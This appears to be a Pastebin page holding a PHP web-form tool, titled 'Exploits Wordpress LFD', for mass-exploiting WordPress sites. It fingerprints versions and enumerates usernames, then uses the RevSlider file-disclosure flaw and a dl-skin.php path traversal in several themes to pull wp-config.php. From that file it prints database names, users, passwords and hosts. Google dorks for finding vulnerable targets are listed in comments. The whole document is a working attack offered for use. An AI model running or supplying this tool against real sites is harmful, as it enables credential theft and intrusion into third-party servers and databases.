Googleinurl

[SCRIPT]=> Exploits Wordpress LFD

Aug 23rd, 2014
1,275
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <body>
  3. <pre><center>                  
  4.  
  5.  
  6.         <h2>Exploits Wordpress LFD </h2>
  7.        
  8.             <p>Coded by jsass , Twitter : @kwSecurity</p>
  9.  
  10. _______________________________________________________________
  11.  
  12.     <pre><hre>
  13.     <form method='POST'>
  14.     <textarea name='sites' cols='45' rows='15'></textarea>
  15.     <input type='submit' value='Exploit' /><br>
  16.     </form>
  17.  
  18.  
  19. <?php
  20.  
  21. # Coded by : jsass
  22. # Exploits Wordpress LFD
  23. # Twitter : @KwSecurity
  24. # Great's To Sec4ever.com &
  25.  
  26. /**
  27.  Dork Google: revslider.php "index of"
  28.  "wp-content/themes/construct/"
  29.  "wp-content/themes/persuasion"
  30.  "wp-content/themes/manbiz2"
  31.  "wp-content/themes/elegance"
  32.  "wp-content/themes/modular/"
  33.  "wp-content/themes/myriad/"
  34.  "wp-content/themes/echelon/"
  35.  "wp-content/themes/fusion/"
  36.  "wp-content/themes/awake/"
  37. **/
  38.  
  39.  
  40.  
  41. @set_time_limit(0);
  42. ob_implicit_flush(true);
  43. ob_end_flush();
  44.  
  45. $sites = explode("\r\n", $_POST['sites']);
  46.  
  47. foreach($sites as $site) {
  48.  
  49. $site = trim($site);
  50.  
  51. $ch = curl_init();
  52. curl_setopt($ch, CURLOPT_URL, "$site");
  53. curl_setopt($ch, CURLOPT_HEADER, 1);
  54. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  55. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  56. $get = curl_exec($ch);
  57. curl_close($ch);
  58.     if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  59.     $str = str_replace('/>', "", $version[0]);
  60.     $str = str_replace('"', "", $str);
  61.    
  62.     $users = @file_get_contents("$site/?author=1");
  63.     preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  64.     $wpuser = explode('|',$user[1]);
  65. echo " <br>-----------------------------------</br>";
  66. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  67.    
  68.     # Dork Google: revslider.php "index of"
  69.  
  70. $ch = curl_init();
  71. curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
  72. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  73. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  74. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  75. $xp = curl_exec ($ch);
  76. curl_close($ch);
  77.  
  78. if(preg_match("#DB_USER#i",$xp)){
  79. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  80. echo "DB_NAME:{$DB_NAME[1]}<br>";
  81. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  82. echo "DB_USER:{$DB_USER[1]}<br>";
  83. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  84. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  85. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  86. echo "DB_HOST:{$DB_HOST[1]}<br>";
  87.  
  88. }
  89.  
  90. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
  91.     foreach($lt as $l){
  92.     $site = "$site/$l";
  93. $process = curl_init($site);
  94. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  95. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  96. curl_setopt($process, CURLOPT_HEADER, TRUE);
  97. curl_setopt($process, CURLOPT_POST, 1);
  98. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  99. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  100. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  101. $return = curl_exec($process);
  102. if(preg_match("#DB_USER#i",$return)){
  103. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  104. echo "DB_NAME:{$DB_NAME[1]}<br>";
  105. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  106. echo "DB_USER:{$DB_USER[1]}<br>";
  107. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  108. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  109. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  110. echo "DB_HOST:{$DB_HOST[1]}<br>";
  111. break;
  112. echo " <br>-----------------------------------</br>";
  113.  
  114. }
  115. }
  116. }
  117.  
  118. ?>
  119. </html>
  120. </body>
  121. </pre></center>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×